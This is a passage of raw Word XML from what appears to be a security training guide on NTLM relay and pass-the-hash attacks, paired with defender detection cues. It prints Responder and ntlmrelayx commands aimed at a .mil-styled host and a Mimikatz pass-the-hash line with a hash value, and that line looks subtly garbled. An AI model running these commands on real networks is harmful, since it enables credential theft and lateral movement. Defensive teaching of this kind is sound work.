        </w:rPr>
        <w:t xml:space="preserve"> the subnet </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="397300"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> spoof responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> Responder.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> -I eth0 -rPv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">. Automatically feed captured authentication payloads into </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> active SMB relay connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> ntlmrelayx.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>sm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>b:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>//target-host.mil-net.mil -smb2support -socks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155A8A0F" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF76332" w14:textId="45B20BBF" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B"/>
    <w:p w14:paraId="5A66149C" w14:textId="0AA522AD" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If the relayed user accounts hold administrative privileges on target-host.mil-net.mil, the tool drops an interactive command shell or dumps the local SAM database back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931985D" w14:textId="53B8E672" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Defender Red Flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> TTP Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6ADAD8" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows Security Event ID 4624</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAEECA6" w14:textId="005A7ED8" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Successful Logon:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Examine the logon parameters on the targeted device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E994C78" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Logon Type 3 Anomaly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B94D02" w14:textId="55C9ED16" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relay attacks generate network logons (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Logon Type 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57316AC0" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Source/Target Disconnect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC221D" w14:textId="6611E2A9" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for authentication sequences where the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Source Network Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> field tracks to a workstation, but the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Workstation Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter embedded inside the NTLM authentication block does not match the actual originating device name. This indicates an identity interception in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64458AF3" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network Baseline:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> High volumes of outbound multicast UDP traffic over port 5355 (LLMNR) or port 137 (NetBIOS Name Service) indicate that endpoints are falling back to legacy protocols and actively inviting relay positioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF07301" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0AA7975A">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5578C853" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4. Offensive Logic: Pass-the-Hash (PtH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E926B" w14:textId="3C29DBFA" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pass-the-Hash relies on the structural design of NTLM. Because NTLM does not use salts during network authentication protocols, the raw password hash acts exactly like the cleartext password itself. If an attacker gains local administrator access on a machine, they scrape the memory space of the Local Security Authority Subsystem Service (LSASS) to harvest hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">es </w:t>
      </w:r>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and pass them to other systems laterally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1053FB19" w14:textId="77777777" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Attacker Execution (Overpass-the-Hash Variation via PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D4BB0A" w14:textId="77777777" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An attacker injects a stolen NTLM hash straight into a new logon process session structure without ever discovering the true text password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759371DD" w14:textId="77777777" w:rsidR="002D273F" w:rsidRDefault="002D273F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="888888"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053CEB20" w14:textId="16842FDA" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t># Inject an NTLM hash directly into a spawned cmd/powershell process block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Invoke-WmiMethod -Class Win32_Process -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create -ArgumentList </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"sekurlsa::pth /user:Administrator /domain:mil-net.mil /ntlm:ab53180415a7218310c80415a7218310 /run:powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7723C0" w14:textId="77777777" w:rsidR="002D273F" w:rsidRDefault="002D273F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D5F605" w14:textId="135028E1" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="002D273F"/>
    <w:p w14:paraId="69A7023B" w14:textId="77777777" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This spawns a new window with network tokens matching the targeted administrative account, granting immediate access to network files and remote services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D832D" w14:textId="77777777" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Defender Red Flags &amp; TTP Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3518AB48" w14:textId="1B807A7E" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Security Event ID 4624 (Logon Type 9 </w:t>
      </w:r>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NewCredentials</w:t>
      </w:r>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E24D8" w14:textId="2CAE484E" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When an attacker performs an Overpass-the-Hash or Pass-the-Hash operation locally to generate network authentication material, Windows flags this with Logon Type 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AD9B2" w14:textId="77777777" w:rsidR="002D273F" w:rsidRPr="002D273F" w:rsidRDefault="002D273F" w:rsidP="002D273F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D273F">
        <w:rPr>
